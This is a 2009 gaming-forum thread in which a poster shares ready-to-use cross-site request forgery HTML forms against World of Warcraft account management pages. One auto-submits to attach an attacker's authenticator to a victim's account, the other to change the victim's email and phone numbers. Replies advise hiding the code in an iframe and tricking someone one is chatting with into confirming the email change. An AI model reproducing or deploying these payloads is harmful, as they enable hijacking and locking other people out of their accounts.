Account admin vulnerabilities menu
Follow us:
100% Up to 1000$
4.9/5
Claim your Bonus
150% Up to 200$ & 20 Freespins
4.8/5
Claim your Bonus
Up to 1 BTC
4.9/5
Claim your Bonus
20% Cashback
4.8/5
Claim your Bonus
Up to 5 BTC
4.8/5
Claim your Bonus
100% Up to 1 BTC
4.7/5
Claim your Bonus
Up to 5 BTC
4.7/5
Claim your Bonus
110% Up to 1 BTC
4.6/5
Claim your Bonus

User Tag List

Results 1 to 3 of 3
  1. 03-05-2009 #1
    reduction's Avatar
    reduction
    reduction is offline
    Member
    Reputation
    19
    Join Date
    Jan 2009
    Posts
    22
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Account admin vulnerabilities

    Account admin vulnerabilities
    Th person you are targeting must be logged in when they visit a webpage with one of these pieces of html code on it. This could be much sneakier if the code was in a hidden iframe.

    I have not been able to test many of these but there is no reason they shouldn't work.

    Set an authenticator onto someone's account
    HTML Code:
    <form id="formSecurityToken" method="post" name="formSecurityToken" action="https://www.worldofwarcraft.com/account/physical-security-token.html">
<input type="hidden" name="tokenID" value="<insert authenticator id here>"  />
</form>
<script type="text/javascript">document.getElementById('formSecurityToken').submit();</script>
    Change someone's contact information (attempting to change their email will send them a confirmation email to the old address):
    HTML Code:
    <form id="form1" name="form1" method="post" action="https://www.worldofwarcraft.com/account/change-contact.html">
<input name="newEmail" value="<new email>" type="hidden" />
<input name="newPhoneNumber1" value="<insert daytime phone number>" type="hidden" />
<input name="newPhoneNumber1Ext" value="<insert daytime phone extension>" type="hidden" />
<input name="newPhoneNumber2" value="<insert evening phone number>" type="hidden" />
<input name="newPhoneNumber2Ext" value="<insert evening phone extension>" type="hidden" />
</form>
<script type="text/javascript">document.getElementById('form1').submit();</script>
    more to come.
    Reply With Quote Reply With Quote
    Account admin vulnerabilities
  2. 03-05-2009 #2
    Tierman's Avatar
    Tierman
    Tierman is offline
    Active Member
    Reputation
    40
    Join Date
    Jan 2009
    Posts
    343
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Wow. So I just add this to the html of my page? How will I know which accounts I changed the info on?
    Reply With Quote Reply With Quote
  3. 03-05-2009 #3
    reduction's Avatar
    reduction
    reduction is offline
    Member
    Reputation
    19
    Join Date
    Jan 2009
    Posts
    22
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Tierman View Post
    Wow. So I just add this to the html of my page? How will I know which accounts I changed the info on?
    It will not work if they are not logged into account admin at the time. There is no way of knowing who's information you changed. The best use of this would be to use this against someone you are communication with.

    Changing someone's email address will send the original email address a conformation email asking them to click a link. You might be able to convince them to click the link.

    Read this for more information on this type of exploit:
    Cross-site request forgery - Wikipedia, the free encyclopedia
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Similar Threads

  1. Um, how do i make an account admin using the database Apache?
    By solomen1313 in forum World of Warcraft General
    Replies: 0
    Last Post: 12-28-2009, 06:33 PM
  2. I need the Account Admin Supervisor email address...
    By Epiphonic in forum World of Warcraft General
    Replies: 6
    Last Post: 01-16-2009, 10:36 AM
  3. How to create a account[admin] in ...
    By twinkleken in forum WoW EMU Questions & Requests
    Replies: 3
    Last Post: 12-18-2008, 09:35 AM
  4. Need to know how to set my account to be admin on ascent server!
    By chernoble in forum World of Warcraft Emulator Servers
    Replies: 4
    Last Post: 10-15-2007, 10:02 PM
All times are GMT -5. The time now is 03:21 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search